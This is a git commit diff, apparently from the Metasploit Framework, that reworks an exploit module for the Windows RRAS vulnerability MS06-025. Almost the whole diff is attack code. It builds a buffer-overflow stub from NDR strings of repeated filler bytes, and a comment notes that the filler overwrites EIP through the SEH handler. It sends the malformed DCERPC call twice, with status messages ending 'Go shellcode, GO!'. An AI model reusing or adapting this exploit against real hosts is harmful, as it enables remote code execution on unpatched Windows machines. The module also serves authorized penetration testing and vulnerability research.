Closer...

git-svn-id: file:///home/svn/framework3/trunk@3713 4d416f70-5f16-0410-b530-b9f4589650da
2006-06-20 20:45:50 +00:00 · 2006-06-20 20:45:50 +00:00 · bb0def749f
parent 0cf2909fda
commit bb0def749f
1 changed files with 36 additions and 22 deletions
--- a/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb
+++ b/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb
@ -55,31 +55,37 @@ class Exploits::Windows::Smb::MS06_025_RASMANS_REG < Msf::Exploit::Remote
 		dcerpc_bind(handle)
 		print_status("Bound to #{handle}")
        
+		# This ends up mapping to invalid unicode and breaks the exploit
+		patt = Rex::Text.pattern_create(1024)
+		
+		# This triggers eip = 0x51515151 after seh is triggered
+		patt = "\x51" * 1024
+		
        type2 = 
-			NDR.wstring("\x41" * 255)  + 
-			NDR.wstring("\x41" * 4096) +
-			NDR.wstring("\x41" * 4096) +
+			NDR.string( ("\x41" *  1024) + "\x00" ) +
+			NDR.string( (patt) + "\x00" ) +
+			NDR.string( ("\x61" *  4096) + "\x00" ) +
            NDR.long(4) +
            NDR.long(4) 
          
        type1 = 
-            NDR.long(4) +
-            NDR.long(4) +
-            NDR.long(4) +
-            NDR.long(4) +
-            NDR.long(4) +
-            NDR.long(4) +
-            NDR.long(4) +
-            NDR.long(4) +
-            NDR.long(4) +
-            NDR.long(4) +
-            NDR.long(4) +
-            NDR.long(4) +
-            NDR.long(4) +
-            NDR.long(4) +
-            NDR.long(4) +
-            NDR.long(4) +
-            NDR.long(4) +
+            NDR.long(4) + # OperatorDial
+            NDR.long(4) + # PreviewPhoneNumber
+            NDR.long(4) + # UseLocation
+            NDR.long(4) + # ShowLights
+            NDR.long(4) + # ShowConnectStatus
+            NDR.long(4) + # CloseOnDial
+            NDR.long(4) + # AllowLogonPhonebookEdits
+            NDR.long(4) + # AllowLogonLocationEdits
+            NDR.long(4) + # SkipConnectComplete
+            NDR.long(4) + # NewEntryWizard
+            NDR.long(4) + # RedialAttempts
+            NDR.long(4) + # RedialSeconds
+            NDR.long(4) + # IdleHangUpSeconds
+            NDR.long(4) + # RedialOnLinkFailure
+            NDR.long(4) + # PopupOnTopWhenRedialing
+            NDR.long(4) + # ExpandAutoDialQuery
+            NDR.long(4) + # CallbackMode

            NDR.long(0x45) + type2 +        # Parsed by CallbackListFromRpc
            NDR.wstring("\x00" * 129) +
@ -103,10 +109,18 @@ class Exploits::Windows::Smb::MS06_025_RASMANS_REG < Msf::Exploit::Remote
        
 		stubdata = type1 + NDR.long(4)
        print_status('Stub is ' + stubdata.length.to_s + ' bytes long.')
-		print_status('Calling the vulnerable function...')
+		

 		begin
+			print_status('One for the money...')
 			response = dcerpc.call(0xA, stubdata)
+			
+			print_status('Two for the show...')
+			response = dcerpc.call(0xA, stubdata)
+			
+			print_status('Three to get ready...')
+			print_status('Go shellcode, GO!')
+			
 		rescue Rex::Proto::DCERPC::Exceptions::NoResponse
 		end